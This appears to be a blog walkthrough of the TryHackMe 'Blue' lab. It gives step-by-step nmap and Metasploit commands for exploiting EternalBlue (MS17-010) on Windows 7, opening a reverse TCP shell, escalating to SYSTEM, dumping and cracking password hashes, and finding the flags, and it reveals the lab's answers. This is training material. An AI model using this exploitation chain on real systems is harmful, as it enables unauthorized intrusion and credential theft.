top of page

BLUE - Hacking windows using etarnalblue - [THM] Walkthrough

So start by deploying the machine waits for the IP address to get displayed.


let us put this <ip> address under nmap scan

	root@kali# nmap -A <ip>

From this result we know it is running 3 ports under 1000 and it is using Microsoft windows 7 professional service pack 1

lets Scan with the vuln NSE scripts in Nmap to check weather these port and services are vulnerable or not.

	root$kali> nmap --script vuln <ip> -vv

So, it says the port is vulnerable to smb-vuln-ms17-010


Now we know what is vulnerable and also we know the exploit

let's fire our Metasploit now and ATTACK!

	root@kali> msfconsole
	msf6> search ms17-010
	msf6> use 2
	msf6> options
	msf6> set RHOST <target ip>
	msf6> set LHOST <your ip>
	// open new window and ifconfig and copy tun0 <your ip> 
	msf6> set payload windows/x64/shell/reverse_tcp
	msf6> Exploit


Now you have the cmd window of the windows, escalate our privileges but before that, we need the command shell access on our meterpreter session for that we run this in the background. To do so use background command

	C:\Windows\system32> background
	Background session 1" [y/N] y

or u can use the shortcut ctrl+z and hit y and press enter

now your session is in the background to list the sessions use

	msf6 exploit(windows/smb/ms17_010_eternalblue)> sessions

now to move this cmd session in our meterpreter session use command

	  >sessions -u 1

or u can use

	 >use post/multi/manage/shell_to_meterpreter
	 msf post(shell_to_meterpreter)> set session 1
	 msf post(shell_to_meterpreter)> exploit

now use this session

	 sessions 2

Verify that we have escalated to NT AUTHORITY\SYSTEM.

Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'.

This should return that we are indeed a system.

Background this shell afterwards and select our meterpreter session for usage again.


Now you have complete control over the target machine

Within our elevated meterpreter shell, run the command


This will dump all of the passwords on the machine as long as we have the correct

privileges to do so.

Now what you have is a hash which is a non-readable format of your password

So now we will use crackstation to crack that hash you can also use hashcat and any

other NTLM hash cracking tool.

so we copy the hash and crack the answer is - {alqfna22}

this completes your task 4


Now, all we need to do is wander inside the system at a different location to find the flag1/2/3 .txt

It took 5 min and I got all the flags at these locations

	flag1 - C:\
	flag2 - C:\Windows\System32\config
	flag3-  C:\Users\jon\Documents	

Or you can also search all the flags at once by going into parent directory and run the command:

        C:\>dir *falg*.txt /s

hooray all the flag has been found and we completed the machine


565 views0 comments

Recent Posts

See All


bottom of page